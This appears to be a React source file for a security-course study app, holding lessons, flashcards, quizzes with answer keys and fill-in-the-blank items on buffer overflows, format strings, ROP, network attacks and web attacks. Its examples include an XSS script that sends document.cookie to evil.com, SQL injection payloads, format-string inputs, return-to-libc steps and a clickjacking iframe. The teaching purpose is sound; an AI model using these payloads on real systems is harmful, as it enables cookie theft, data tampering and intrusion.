import { useState, useEffect, useRef, useCallback } from "react";

/* ═══════════════════════════════════════════════════════════════
   STYLES
═══════════════════════════════════════════════════════════════ */
const GLOBAL_CSS = `
  @import url('https://fonts.googleapis.com/css2?family=IBM+Plex+Mono:wght@400;500;600&family=DM+Serif+Display:ital@0;1&family=DM+Sans:wght@400;500;600&display=swap');
  *{box-sizing:border-box;margin:0;padding:0;}
  body{background:#060608;font-family:'DM Sans',sans-serif;}
  ::-webkit-scrollbar{width:4px;}
  ::-webkit-scrollbar-track{background:#0a0a0c;}
  ::-webkit-scrollbar-thumb{background:#222;border-radius:2px;}
  @keyframes fadeUp{from{opacity:0;transform:translateY(20px);}to{opacity:1;transform:translateY(0);}}
  @keyframes fadeIn{from{opacity:0;}to{opacity:1;}}
  @keyframes slideRight{from{transform:translateX(-100%);}to{transform:translateX(0);}}
  @keyframes popIn{0%{transform:scale(0.85);opacity:0;}60%{transform:scale(1.05);}100%{transform:scale(1);opacity:1;}}
  @keyframes shake{0%,100%{transform:translateX(0);}20%{transform:translateX(-6px);}40%{transform:translateX(6px);}60%{transform:translateX(-4px);}80%{transform:translateX(4px);}}
  @keyframes pulse{0%,100%{opacity:1;}50%{opacity:0.6;}}
  @keyframes ticker{from{transform:translateX(0);}to{transform:translateX(-50%);}}
  @keyframes xpFloat{0%{opacity:1;transform:translateY(0) scale(1);}100%{opacity:0;transform:translateY(-50px) scale(1.2);}}
  @keyframes blink{0%,100%{opacity:1;}50%{opacity:0;}}
  @keyframes scan{0%{top:-10%;}100%{top:110%;}}
  .fu{animation:fadeUp 0.3s ease both;}
  .fi{animation:fadeIn 0.25s ease both;}
  .pop{animation:popIn 0.3s ease both;}
  .shake{animation:shake 0.35s ease;}
  input:focus{outline:none;}
  button:active{transform:scale(0.97);}
`;

/* ═══════════════════════════════════════════════════════════════
   COMPLETE CURRICULUM DATA
═══════════════════════════════════════════════════════════════ */
const CURRICULUM = [
  {
    id:"bof", title:"Buffer Overflow", icon:"⚡", color:"#ff3b5c", dim:"#ff3b5c22", bg:"#110006",
    summary:"A buffer overflow occurs when input exceeds allocated buffer size, overwriting adjacent memory including the return address — letting attackers hijack execution flow.",
    sections:[
      {
        title:"How Buffers Work",
        content:"C allocates fixed-size arrays on the stack. Functions like strcpy() copy data without checking length. If input > buffer size, overflow into adjacent memory.",
        code:`char buffer[24];
strcpy(buffer, str); // ← no bounds check!
// if str > 24 bytes → OVERFLOW`,
        keyPoints:["Buffer lives on the stack","Adjacent memory includes saved EBP and return address","No bounds checking in unsafe C functions"]
      },
      {
        title:"Stack Layout",
        content:"When a function is called, the stack frame contains (top to bottom, lower addresses up): Local Variables → Stack Frame Pointer (EBP) → Return Address → Parameters.",
        keyPoints:["Stack grows downward (high → low addresses)","EBP points to the previous frame","Return address is where execution resumes after function returns","Overflow writes FROM buffer upward into EBP then return address"]
      },
      {
        title:"The Attack",
        content:"Attacker crafts input: [padding to fill buffer] + [overwrite EBP] + [new return address pointing to shellcode] + [shellcode]. When function returns, it jumps to shellcode.",
        code:`# Distance from buffer to return addr:
# gdb: p &buffer → 0xbfffea28
# gdb: p $ebp    → 0xbfffea48
# offset = 0x48 - 0x28 = 0x20 (32)
# return addr slot = buffer + 0x20 + 4`,
        keyPoints:["Use gdb to find buffer address and EBP","Offset = EBP - buffer_base","Return address slot = buffer + offset + 4 (skip EBP) + 4 (the slot itself)"]
      },
      {
        title:"NOP Sled Technique",
        content:"Exact shellcode address is hard to guess. Fill buffer with 0x90 (NOP = No Operation) instructions before shellcode. Any jump into the NOP region slides into shellcode.",
        keyPoints:["NOP (0x90) advances program counter to next instruction","Widens the target from 1 byte to hundreds","Return address just needs to land anywhere in the NOP region","Standard lab approach: NOPs at start, shellcode at end of payload"]
      },
      {
        title:"Defense: Stack Canary",
        content:"Compiler places a random value ('canary') between the buffer and return address. Before returning, the value is checked. If changed → abort. Enabled with -fstack-protector.",
        keyPoints:["Attacker must know/preserve the canary to bypass","Can be leaked via format string vulnerabilities","Detects overflow but doesn't prevent it","StackGuard is the GCC implementation"]
      },
      {
        title:"Defense: NX Bit (Non-Executable Stack)",
        content:"Hardware feature (Intel NX, AMD XD) marks the stack segment as non-executable. Injected shellcode cannot run.",
        keyPoints:["Does NOT prevent the overflow — only blocks execution","Uses hardware page table bits","BYPASSED by return-to-libc: jumps to existing code, not injected","BYPASSED by ROP: chains existing code snippets","Can break programs that legitimately execute stack data"]
      },
      {
        title:"Defense: ASLR",
        content:"Address Space Layout Randomization randomizes base addresses of stack, heap, and shared libraries on each execution. Hard to guess where shellcode landed.",
        code:`# Disable ASLR (for labs):
sysctl -w kernel.randomize_va_space=0`,
        keyPoints:["Defeats attacks that rely on knowing stack addresses","On 32-bit: limited entropy → brute-force feasible","On 64-bit: much stronger (48-bit address space)","Combined with NX provides strong defense","Not a complete solution alone"]
      },
    ],
    flashcards:[
      {q:"What are the 4 items in a stack frame from top to bottom?", a:"Local Variables → Stack Frame Pointer (EBP) → Return Address → Parameters"},
      {q:"How do you calculate the offset from buffer to return address?", a:"EBP_value - buffer_address = distance to EBP; add 4 bytes for EBP slot → return address"},
      {q:"What is a NOP sled and why is it used?", a:"A sequence of 0x90 (NOP) instructions before shellcode. Any jump into the sled slides to shellcode, making imprecise address guesses work."},
      {q:"Why doesn't NX bit stop return-to-libc?", a:"Return-to-libc jumps to existing executable code (system() in libc), not injected code. NX only blocks the stack from being executed."},
      {q:"What is the safe C string copy hierarchy?", a:"strcpy < strncpy < snprintf < strlcpy (strlcpy is safest)"},
      {q:"How does a stack canary work?", a:"Random value placed between buffer and return address. Checked before function returns. Mismatch → program aborts."},
      {q:"When can ASLR be defeated by brute force?", a:"On 32-bit systems with low entropy — only ~65,536 possible addresses for the stack base"},
      {q:"Which gdb commands find buffer address and EBP?", a:"p &buffer (buffer address) and p $ebp (frame pointer value)"},
    ],
    mcqs:[
      {q:"Which defense does NOT stop return-to-libc attacks?", opts:["Stack Canary","ASLR","NX Bit","Bounds Checking"], ans:2, explain:"NX marks the stack non-executable but return-to-libc jumps to existing executable code in libc, not injected shellcode."},
      {q:"In a stack frame, what sits directly above (lower address than) the buffer?", opts:["Return address","Parameters","Stack Frame Pointer (EBP)","Heap pointer"], ans:2, explain:"Stack layout top-to-bottom: Buffer/locals → EBP → Return Address → Parameters"},
      {q:"What is the primary purpose of a NOP sled?", opts:["Crash the program","Increase tolerance for imprecise shellcode address guesses","Encode the shellcode","Overwrite the canary silently"], ans:1, explain:"NOPs do nothing but advance the PC. Landing anywhere in the sled eventually reaches shellcode."},
      {q:"ASLR is weakest against attackers when:", opts:["NX is disabled","The canary is known","The system is 32-bit with low address entropy","Source code is available"], ans:2, explain:"32-bit ASLR has limited randomness (16 bits of entropy for stack), making brute force feasible."},
      {q:"The unsafe function strcpy() is dangerous because:", opts:["It allocates heap memory","It doesn't null-terminate strings","It copies without checking destination buffer size","It uses the wrong calling convention"], ans:2, explain:"strcpy copies until null terminator with no length limit, potentially overflowing the destination buffer."},
      {q:"A buffer overflow attack needs to:", opts:["Corrupt the heap only","Inject code AND redirect execution to it","Only overwrite the canary","Only modify EBP"], ans:1, explain:"Two goals: (1) get shellcode into address space, (2) redirect execution to it via corrupted return address."},
    ],
    fillBlanks:[
      {t:"The stack grows from ___ addresses to ___ addresses (high to low).", blanks:["high","low"], hint:"Stack direction"},
      {t:"To find distance from buffer to return address: (EBP value) - (buffer address) + ___ bytes.", blanks:["8"], hint:"Skip EBP (4) + return addr slot (4)"},
      {t:"The compiler flag ___ enables stack canary protection in GCC.", blanks:["-fstack-protector"], hint:"GCC flag name"},
      {t:"NX bit is bypassed by ___ attacks which reuse existing executable code.", blanks:["return-to-libc"], hint:"Jumps to libc"},
    ],
  },
  {
    id:"fmt", title:"Format String", icon:"📄", color:"#ff8c00", dim:"#ff8c0022", bg:"#110800",
    summary:"Format string vulnerabilities occur when user-controlled input is passed directly as printf's format string, enabling arbitrary stack reads and writes.",
    sections:[
      {
        title:"What Is a Format String?",
        content:"Functions like printf() use a format string to describe how to print arguments. Specifiers like %d, %s, %x pull values from the argument list (va_list on the stack).",
        code:`// Safe — user input is an argument
printf("%s", user_input);

// VULNERABLE — user controls format string  
printf(user_input);  // ← NEVER do this`,
        keyPoints:["Format specifiers: %d (int), %s (string), %x (hex), %p (pointer), %n (write count)","printf walks va_list reading stack values for each specifier","No stack boundary marker — printf doesn't know when it runs out of arguments"]
      },
      {
        title:"Attack 1 — Crash the Program",
        content:"Input %s%s%s%s: each %s fetches a stack value as a pointer and dereferences it as a string. If the fetched value is an invalid address → segfault.",
        code:`// Attacker input:
"%s%s%s%s%s"
// printf fetches 5 stack values as pointers
// 0x40 is not a valid address → SEGFAULT`,
        keyPoints:["Each %s dereferences whatever value is on the stack","Low values like 0x40 or 0x12 are unmapped → crash","Useful as a denial-of-service attack"]
      },
      {
        title:"Attack 2 — Read Stack Memory",
        content:"Input %x.%x.%x.%x.%x: each %x prints the next stack value as hex. The attacker leaks stack contents including return addresses, canary values, and secrets.",
        code:`// Attacker input:
"%x.%x.%x.%x.%x.%x.%x.%x"
// Output:
// 63.f7fb4580.80491c6.0.0.11223344...
//                              ↑ secret!`,
        keyPoints:["Each %x advances va_list by 4 bytes and prints as hex","Trial and error determines how many %x reach target","Used to leak canary values and bypass stack protection"]
      },
      {
        title:"Attack 3 — Write to Memory (%n)",
        content:"%n writes the count of characters printed so far into the address pointed to by the next va_list argument. Combined with address placement: arbitrary memory write.",
        code:`printf("hello%n", &i);
// i = 5  (5 chars printed before %n)

// Attacker trick:
// Place target address on stack via input
// Walk va_list to it with %x specifiers
// Use %n to write to that address`,
        keyPoints:["%n is the write primitive — extremely dangerous","Can change program variables, return addresses, function pointers","More powerful than buffer overflow — arbitrary read AND write","Considered more dangerous than stack buffer overflow"]
      },
      {
        title:"Countermeasures",
        content:"Developer fix: never pass user input as format string. Use printf(\"%s\", buf) not printf(buf). Compiler warning: -Wformat=2.",
        code:`// VULNERABLE:
printf(buf);
sprintf(format, "%s %s", user_input, ": %d");
printf(format, program_data);

// SAFE:
printf("%s", buf);
printf("%s: %d", user_input, program_data);`,
        keyPoints:["Affected functions: printf, sprintf, fprintf, vprintf, scanf, vfscanf","Compiler flag: gcc -Wformat=2 -Wformat-security","Static analysis tools can detect these patterns","Modern glibc warns when format string is not a literal"]
      }
    ],
    flashcards:[
      {q:"What makes printf(buf) dangerous when buf is user input?", a:"The attacker controls the format string and can use %x/%s/%n to read stack memory, crash the program, or write to arbitrary addresses."},
      {q:"What does %n write and where?", a:"Writes the count of characters printed so far into the memory address pointed to by the current va_list argument."},
      {q:"How does Attack 1 (crash) work?", a:"Input %s%s%s%s — each %s fetches a stack value as a pointer and dereferences it. Invalid addresses cause segmentation fault."},
      {q:"How does Attack 2 (read stack) work?", a:"Input %x.%x.%x.%x — each %x prints the next 4-byte stack value as hex, leaking memory contents by trial and error."},
      {q:"Why is format string vuln considered more dangerous than buffer overflow?", a:"It enables both arbitrary reads AND arbitrary writes without needing to know exact addresses — just stack offsets via trial/error."},
      {q:"Name 5 functions vulnerable to format string attacks.", a:"printf, sprintf, fprintf, vprintf, scanf, vfscanf"},
    ],
    mcqs:[
      {q:"What does printf(\"hello%n\", &i) store in i?", opts:["0","5","The address of 'hello'","Undefined behavior only"], ans:1, explain:"%n writes the number of characters printed before it. 'hello' = 5 chars → i = 5."},
      {q:"Which input is most likely to crash via format string?", opts:["%d%d%d","%s%s%s%s%s","%x%x%x","%p%p"], ans:1, explain:"%s dereferences stack values as string pointers. Invalid addresses → segfault. %d/%x/%p just print values, which is safer."},
      {q:"Format string vulnerability differs from buffer overflow in that it:", opts:["Requires root privileges","Allows both reading AND writing arbitrary memory","Only works on 32-bit systems","Requires knowing the source code"], ans:1, explain:"Format string vuln enables arbitrary reads (%x, %s) and writes (%n). Buffer overflow primarily enables code injection."},
      {q:"The safe fix for printf(buf) is:", opts:["printf(buf, NULL)","printf(\"%s\", buf)","sprintf(safe, buf)","puts(buf) only works for integers"], ans:1, explain:"printf(\"%s\", buf) passes user input as an argument, not as the format string. The format string is a hardcoded literal."},
    ],
    fillBlanks:[
      {t:"The format specifier ___ writes the character count printed so far into a provided memory address.", blanks:["%n"], hint:"The dangerous write specifier"},
      {t:"printf(___ ) is vulnerable; printf(\"%s\", buf) is safe because in the safe version, user input is a ___ not a format string.", blanks:["buf","data argument"], hint:"First: passing buf directly. Second: what user input becomes."},
      {t:"To read stack values, an attacker uses ___ specifiers; to write to memory they use the ___ specifier.", blanks:["%x","%n"], hint:"Read then write"},
    ],
  },
  {
    id:"cra", title:"Code Reuse Attacks", icon:"♻️", color:"#c8e600", dim:"#c8e60022", bg:"#0c0e00",
    summary:"Code Reuse Attacks bypass NX/non-executable stack by reusing existing executable code rather than injecting new shellcode. Includes return-to-libc, ROP, and JOP.",
    sections:[
      {
        title:"Why Code Reuse?",
        content:"NX bit blocks injected shellcode from executing. Solution: instead of injecting code, reuse existing code already in executable memory regions (libc, binary segments).",
        keyPoints:["NX marks stack non-executable but NOT the libc code region","Shared libraries (libc) are always mapped into process memory","These regions ARE executable — NX doesn't protect them","Three generations: Return-to-libc (1997), ROP (2007), JOP (2010)"]
      },
      {
        title:"Return-to-libc",
        content:"Overwrite the return address with the address of system() in libc. Arrange the stack so system() receives '/bin/sh' as its argument. When the vulnerable function returns, system('/bin/sh') executes.",
        code:`# Task A: find system() address
(gdb) p system
$1 = {<text variable>} 0xb7e5f430

# Task B: find "/bin/sh" string
(gdb) find &system, +9999999, "/bin/sh"
0xb7f83a24

# Task C: craft stack layout
[padding][system() addr][fake ret][/bin/sh addr]`,
        keyPoints:["system() executes a command in a child process via shell","exec() replaces current process — use fork()+exec() for child","Three tasks: find system(), find '/bin/sh', construct argument stack","The 'fake return address' is what system() would return to (can be anything)"]
      },
      {
        title:"Return Oriented Programming (ROP)",
        content:"Instead of one libc function, chain together 'gadgets' — short existing instruction sequences ending in RET. The RET pops the next gadget address from the attacker-controlled stack.",
        code:`# Gadget examples found in binary:
0x8048abc: pop eax; ret
0x8048def: pop ebx; ret  
0x8048f01: xor eax,eax; ret
0x8048f10: int 0x80; ret

# ROP chain on stack:
[gadget1_addr][arg1][gadget2_addr][arg2]...`,
        keyPoints:["A gadget = any instruction sequence ending in RET","RET pops return address → chains to next gadget","Turing-complete: can build any computation from gadgets","Tools: ROPgadget, pwntools automatically find gadgets","Challenges: finding needed gadgets, correct ordering"]
      },
      {
        title:"Jump Oriented Programming (JOP)",
        content:"Variant of ROP that uses JMP instructions instead of RET to chain gadgets. Evades ROP-specific defenses (like shadow stacks) that monitor RET instructions.",
        keyPoints:["Uses JMP-ending gadgets instead of RET-ending","A 'dispatcher gadget' manages the chain (like RET does in ROP)","Harder to construct than ROP but evades RET-monitoring defenses","Published 2010 by Bletsch et al."]
      }
    ],
    flashcards:[
      {q:"What is a ROP gadget?", a:"Any short instruction sequence ending in a RET instruction. Used to build arbitrary computation by chaining gadget addresses on the stack."},
      {q:"How does ROP chain execution work?", a:"Each RET pops the next gadget address off the attacker-controlled stack, jumps to it, executes a few instructions, then RET pops the next address — chaining indefinitely."},
      {q:"What 3 tasks are needed for return-to-libc?", a:"(A) Find address of system(). (B) Find address of '/bin/sh' string. (C) Arrange stack so system() receives '/bin/sh' as its argument."},
      {q:"Why does return-to-libc bypass NX?", a:"NX blocks execution of injected stack code. Return-to-libc jumps to system() which already lives in executable libc memory — no injected code involved."},
      {q:"How does JOP differ from ROP?", a:"JOP uses JMP-ending gadgets with a dispatcher gadget instead of RET-ending gadgets. Evades defenses that monitor the RET instruction."},
    ],
    mcqs:[
      {q:"Return-to-libc was developed as a response to which defense?", opts:["Stack Canary","ASLR","NX Bit / Non-executable stack","DNSSEC"], ans:2, explain:"NX made injected shellcode non-executable. Return-to-libc (1997) was the response: reuse existing libc code instead."},
      {q:"A ROP chain is executed because:", opts:["The stack is executable","Each RET instruction pops the next gadget address from the attacker-controlled stack","system() is called directly","The binary has no ASLR"], ans:1, explain:"RET pops the top of stack as return address. With attacker-controlled stack, each RET chains to the next gadget."},
      {q:"Which tool would help find ROP gadgets in a binary?", opts:["gdb p $ebp","ROPgadget / pwntools","objdump -d only finds functions","nm lists symbols"], ans:1, explain:"Tools like ROPgadget and pwntools automatically scan binaries for instruction sequences ending in RET."},
    ],
    fillBlanks:[
      {t:"Return-to-libc bypasses the ___ bit by jumping to existing executable code in libc.", blanks:["NX"], hint:"No-eXecute"},
      {t:"A ROP ___ is any instruction sequence ending in RET used to build the attack chain.", blanks:["gadget"], hint:"The building block"},
      {t:"The three code reuse attack generations are: Return-to-libc (1997), ___ (2007), and JOP (2010).", blanks:["ROP"], hint:"Return Oriented Programming"},
    ],
  },
  {
    id:"net", title:"Network Security", icon:"🌐", color:"#00c8ff", dim:"#00c8ff22", bg:"#00090f",
    summary:"Network attacks exploit unauthenticated and unencrypted protocols at the Link, IP, TCP, and Application layers. Key attacks: ARP poisoning, IP spoofing, SYN flooding, TCP reset, DNS cache poisoning.",
    sections:[
      {
        title:"Link Layer & ARP",
        content:"The Link Layer (Data Link) transfers frames in a LAN using MAC addresses. ARP (Address Resolution Protocol) maps IP addresses to MAC addresses — but has NO authentication.",
        keyPoints:["MAC addresses are 48-bit hardware addresses","ARP request: 'Who has IP X? Tell me your MAC'","ARP reply: 'IP X is at MAC YY:YY:YY:YY:YY:YY'","Machines accept ARP replies even without a prior request","ARP cache stores IP→MAC mappings temporarily"]
      },
      {
        title:"ARP Cache Poisoning Attack",
        content:"Attacker Eve sends unsolicited ARP replies claiming Bob's IP maps to Eve's MAC (to Alice) and Alice's IP maps to Eve's MAC (to Bob). Both victims update their caches.",
        code:`# Eve sends to Alice:
ARP Reply: Bob's IP → Eve's MAC
# Alice's cache: Bob's IP ↔ Eve's MAC ✗

# Eve sends to Bob:  
ARP Reply: Alice's IP → Eve's MAC  
# Bob's cache: Alice's IP ↔ Eve's MAC ✗

# Result: ALL Alice↔Bob traffic → Eve`,
        keyPoints:["Enables MITM: Eve can read, modify, relay traffic","Enables DoS: Eve drops traffic instead of relaying","ARP replies accepted without prior request","Countermeasures: static ARP tables, detect duplicate MACs, restrict LAN access, inspect all ARP packets"]
      },
      {
        title:"IP Layer Vulnerabilities",
        content:"IP has three key security weaknesses: (1) Unencrypted transmission — eavesdropping at any router. (2) No source authentication — sender can spoof source address. (3) No integrity checking — packets can be modified en route.",
        keyPoints:["IP spoofing: overwrite source IP field — never verified by routers","Eavesdropping: any intermediate router can capture packets","Packet modification: headers and payload changeable in transit","Fix: IPSec provides authentication and encryption at IP layer"]
      },
      {
        title:"IPSec",
        content:"IP Security Extensions — framework of protocols for cryptographic security at the IP packet layer. Mandatory in IPv6, optional in IPv4.",
        code:`Transport Mode (host-to-host):
[IP hdr][IPSec hdr][TCP hdr + Data]
         ←authenticated→←encrypted→

Tunnel Mode (gateway-to-gateway, VPNs):
[New IP][IPSec hdr][Orig IP hdr][TCP][Data]
         ←————— authenticated ——————→`,
        keyPoints:["Transport mode: protects upper-layer protocols only","Tunnel mode: wraps entire original IP packet — used in VPNs","Provides: authentication (who sent it), integrity (not tampered), confidentiality (encrypted)","Used in site-to-site VPNs between branch offices"]
      },
      {
        title:"TCP 3-Way Handshake & SYN Flooding",
        content:"TCP requires 3-way handshake: SYN → SYN-ACK → ACK. The server MUST store state (TCB entry) after receiving SYN, before handshake completes. SYN flood exploits this.",
        code:`# SYN Flood attack:
while True:
    send SYN with spoofed_source_ip
    # Server stores TCB entry
    # Never sends ACK → entry stays
    # Server queue fills up
    # Legitimate connections REJECTED`,
        keyPoints:["TCB (Transmission Control Block) allocated per half-open connection","Queue is finite — fill it → DoS","Spoofed source IPs mean SYN-ACK goes to innocent hosts","Fix: SYN cookies — encode state in seq# without storing TCB","SYN-ACK timeout eventually cleans entries (too slow against flood)"]
      },
      {
        title:"TCP Reset Attack",
        content:"A single TCP RST packet with the correct 5-tuple immediately tears down a TCP connection between two parties. Attacker spoofs one party's IP.",
        code:`# RST packet needs correct:
1. Source IP address      (known - sniff)
2. Destination IP         (known - sniff)
3. Source Port            (known - sniff)
4. Destination Port       (known - sniff)
5. Sequence Number        (must estimate!)
   → must be within receiver's window`,
        keyPoints:["Sequence number is the hard part — must be in the current window","Can sniff sequence numbers if on same network","Window size gives ~65,536 guesses to try","Used to disrupt TCP-based communications (BGP, SSH, etc.)"]
      },
      {
        title:"DNS System",
        content:"Domain Name System: distributed hierarchical database mapping hostnames to IP addresses. Implemented as an application-layer protocol using UDP port 53.",
        keyPoints:["Hierarchy: Root → TLD (.com) → Authoritative → Local resolver","DNS caches results for TTL (Time To Live) period","16-bit transaction ID matches queries to responses","Operating systems and browsers maintain their own DNS caches"]
      },
      {
        title:"DNS Cache Poisoning",
        content:"Inject false DNS records into a resolver's cache. All users of that resolver will get attacker-controlled IP addresses for the poisoned domain.",
        code:`# Attack against local DNS server:
# 1. Attacker triggers query to target.com
# 2. Attacker floods DNS server with
#    forged responses (correct txn ID)
# 3. Forged response accepted before real one
# 4. Cache stores attacker's IP for target.com
# 5. All users get attacker's IP → phishing`,
        keyPoints:["16-bit transaction ID = only 65,536 values — guessable","Cache poisoned when server: disregards IDs, has predictable IDs, or accepts unsolicited records","Countermeasures: random IDs, port randomization, DNSSEC","Kaminsky attack (2008) made this practical"]
      },
      {
        title:"DNSSEC",
        content:"DNS Security Extensions — adds cryptographic signatures to DNS records. Resolvers can verify data came from legitimate source and wasn't tampered.",
        keyPoints:["DNSSEC DOES: authenticate origin, verify integrity, prove nonexistence","DNSSEC DOES NOT: provide confidentiality (still plaintext), guarantee availability, protect against compromised nameservers","Uses public-key cryptography with hierarchical trust chain","Deployment: root signed 2010, most TLDs now support it"]
      }
    ],
    flashcards:[
      {q:"Why does ARP cache poisoning work?", a:"Machines accept ARP replies even without a prior request. ARP has no authentication mechanism — any machine can claim any IP."},
      {q:"What does ARP cache poisoning enable?", a:"Man-in-the-middle attacks (read/modify traffic) or denial-of-service (drop traffic). All traffic between Alice and Bob routes through Eve."},
      {q:"What are the 3 IP layer vulnerabilities?", a:"(1) Unencrypted transmission (eavesdropping). (2) No source authentication (IP spoofing). (3) No integrity checking (packet modification en route)."},
      {q:"Difference between IPSec Transport and Tunnel mode?", a:"Transport mode protects upper-layer protocols only (TCP/data). Tunnel mode wraps the entire original IP packet with a new IP header — used in VPNs."},
      {q:"Why does SYN flooding work?", a:"Server must store TCB state after receiving SYN before 3-way handshake completes. Attacker floods with spoofed SYNs, filling the queue. Legitimate connections rejected."},
      {q:"What 5 fields must a TCP RST packet have correct?", a:"Source IP, Destination IP, Source Port, Destination Port, and Sequence Number (within receiver's window)."},
      {q:"What does DNSSEC NOT provide?", a:"Confidentiality (DNS is still plaintext), availability guarantees, and protection against compromised nameservers."},
      {q:"Why is the DNS 16-bit transaction ID a security weakness?", a:"Only 65,536 possible values — attacker can flood with guesses to match a query's ID and inject a forged response before the real one arrives."},
    ],
    mcqs:[
      {q:"ARP cache poisoning succeeds because:", opts:["ARP uses TCP","Machines update ARP cache for any reply, even unsolicited","MAC addresses are publicly registered","ARP runs over HTTPS"], ans:1, explain:"ARP has no authentication. Machines blindly accept ARP replies and update their cache, even without a prior ARP request."},
      {q:"IPSec Tunnel Mode differs from Transport Mode by:", opts:["Using different encryption","Protecting only the TCP header","Wrapping the entire original IP packet with a new IP header","Only working on IPv6"], ans:2, explain:"Tunnel mode encapsulates the complete original IP datagram, hiding even the original source/destination IPs. Used in VPNs."},
      {q:"SYN flooding exhausts server resources because:", opts:["It encrypts traffic","Server allocates TCB state per half-open connection before handshake completes","ACK packets are very large","TCP has no timeout"], ans:1, explain:"The server must store connection state after SYN_RECEIVED. Attacker never completes handshake, filling the finite TCB queue."},
      {q:"The hardest field for an off-path attacker to forge in a TCP RST attack is:", opts:["Source IP","Destination IP","Source Port","Sequence Number"], ans:3, explain:"Sequence number must fall within the receiver's current window. Source/dest IPs and ports are visible in sniffed traffic."},
      {q:"DNS cache poisoning is possible because:", opts:["DNS uses TCP","The 16-bit transaction ID has only 65,536 possible values","DNS caches never expire","DNSSEC is mandatory"], ans:1, explain:"An attacker can flood with forged responses across all 65,536 possible transaction IDs, likely matching a pending query."},
      {q:"DNSSEC provides:", opts:["Confidentiality of DNS queries","Authentication that records came from legitimate source","Guaranteed availability","Protection if nameserver is compromised"], ans:1, explain:"DNSSEC cryptographically signs records to prove authenticity and integrity. It does NOT encrypt queries or guarantee uptime."},
    ],
    fillBlanks:[
      {t:"ARP poisoning sends unsolicited ARP ___ packets to overwrite victims' IP-to-MAC cache entries.", blanks:["reply"], hint:"The ARP message type that updates caches"},
      {t:"In SYN flooding, the server's ___ queue fills up, preventing legitimate connections.", blanks:["TCB"], hint:"Transmission Control Block"},
      {t:"A TCP RST attack requires a correct ___ number within the receiver's window, making it the hardest field to forge.", blanks:["sequence"], hint:"TCP ordering field"},
      {t:"DNSSEC uses ___ cryptography to sign DNS records, allowing resolvers to verify authenticity.", blanks:["public-key"], hint:"Asymmetric crypto"},
    ],
  },
  {
    id:"web", title:"Web Security", icon:"🕸️", color:"#b060ff", dim:"#b060ff22", bg:"#08000f",
    summary:"Web attacks target the application layer: XSS injects scripts into pages, SQL injection manipulates database queries, session hijacking steals identity tokens, clickjacking deceives users into unintended actions.",
    sections:[
      {
        title:"Session Management",
        content:"HTTP is stateless. Web apps use session tokens (cookies, session IDs in URLs/POST) to remember authenticated users. Session IDs must be random and protected.",
        keyPoints:["Session token sent with every request after login","Must be random — predictable IDs are guessable","Session hijacking: steal or forge a valid session token","Replay attack: use a previously captured token","Fix: HTTPS (encrypt in transit), random IDs, short expiry, rotate tokens"]
      },
      {
        title:"Session Hijacking",
        content:"Attacker obtains a victim's valid session token and uses it to impersonate them. Token obtained via packet sniffing (HTTP), XSS (document.cookie), or network MITM.",
        code:`# Attacker sniffs Alice's cookie:
sessionID=0x87823fe...

# Attacker sends to server:
GET /account HTTP/1.1
Cookie: sessionID=0x87823fe...
# Server: "That's Alice!" ← HIJACKED`,
        keyPoints:["Packet sniffers capture cookies on unencrypted HTTP","XSS can steal cookies: document.cookie","Replay: reuse old stolen token","Countermeasures: encrypt tokens, random IDs, add nonces, rotate frequently, HTTPS only"]
      },
      {
        title:"Cross-Site Scripting (XSS)",
        content:"Attacker injects JavaScript into a web page. When another user loads the page, the script executes in their browser with the page's origin privileges.",
        code:`<!-- Attacker's malicious comment input: -->
<script>alert("XSS")</script>

<!-- Or to steal cookies: -->
<script>
  new Image().src = 
  "http://evil.com/steal?c=" + document.cookie
</script>

<!-- Server stores it, Alice loads page... -->
<!-- Alice's browser executes Eve's script! -->`,
        keyPoints:["Stored XSS: persisted in database, affects all visitors","Reflected XSS: in URL parameter, reflected back once","Root cause: server doesn't sanitize input before embedding in HTML","Countermeasures: sanitize/escape all input, strip <script> tags, Content-Security-Policy header, disable client-side scripts"]
      },
      {
        title:"SQL Injection",
        content:"User input inserted directly into SQL query string without sanitization. Attacker crafts input that closes the intended query and adds their own SQL.",
        code:`-- Intended query:
SELECT * FROM users WHERE name='INPUT';

-- Attacker input: a' OR 1=1; --
SELECT * FROM users WHERE name='a' OR 1=1; --';
-- OR 1=1 always true → returns ALL rows
-- -- comments out rest → no password check

-- Login bypass: admin'; #
SELECT * FROM users WHERE name='admin';#...
-- Returns admin row, ignores password`,
        keyPoints:["OR 1=1 makes WHERE always true","-- or # comments out the rest of the query","UPDATE injection: ', field=value closes and modifies other fields","Fix: parameterized queries / prepared statements — user input never interpreted as SQL","Also: input validation, least privilege DB accounts, WAF"]
      },
      {
        title:"SQL Injection — Data Modification",
        content:"Injecting into UPDATE queries allows modifying any column in the row, not just the intended field.",
        code:`-- Intended update (phone number field):
UPDATE users SET phone='INPUT' WHERE id=5;

-- Attacker input: ', salary=99999
UPDATE users SET phone='', salary=99999 
WHERE id=5;
-- Changes salary field for user 5!`,
        keyPoints:["Any UPDATE field can be modified if input unsanitized","Can change passwords, salaries, admin flags","Can affect OTHER users via modified WHERE clause","Prepared statements completely prevent this"]
      },
      {
        title:"Clickjacking",
        content:"Attacker overlays an invisible/transparent iframe of a legitimate target page on their own page. User thinks they click the attacker's button, actually clicks the target site.",
        code:`<!-- Attacker's page: -->
<div style="position:relative">
  <!-- Fake button user sees: -->
  <button>Click to win prize!</button>
  
  <!-- Invisible bank on top: -->
  <iframe src="https://mybank.com/transfer"
    style="opacity:0; position:absolute; 
           top:0; left:0; z-index:99">
  </iframe>
</div>
<!-- User clicks "prize" → actually clicks
     bank's transfer button! -->`,
        keyPoints:["User sees attacker's page, clicks target site's elements","Can trigger transfers, likes, follows, downloads","Click-fraud: inflate ad click-through counts","Fix: X-Frame-Options: DENY or SAMEORIGIN header","Fix: Content-Security-Policy: frame-ancestors 'none'"]
      }
    ],
    flashcards:[
      {q:"What is the root cause of XSS?", a:"Server embeds unsanitized user input directly in HTML served to other users. Attacker-injected scripts execute in victims' browsers with the page's privileges."},
      {q:"How does a' OR 1=1; -- work in SQL injection?", a:"'a' closes the string literal. OR 1=1 makes WHERE always true (returns all rows). -- comments out the rest of the query including the password check."},
      {q:"What's the difference between Stored and Reflected XSS?", a:"Stored: injected script persisted in database, affects every user who loads the page. Reflected: script in URL parameter, only affects the user who clicks the malicious link."},
      {q:"How does session hijacking work?", a:"Attacker steals a valid session token (via sniffing, XSS, or MITM) and sends it to the server to impersonate the legitimate user."},
      {q:"What is a replay attack in session context?", a:"Reusing a previously captured (old but once-valid) session token to attempt to re-authenticate as the victim."},
      {q:"How does clickjacking work?", a:"Invisible iframe of target site overlaid on attacker's page. User thinks they're clicking attacker's visible button but actually clicking the target site's hidden element."},
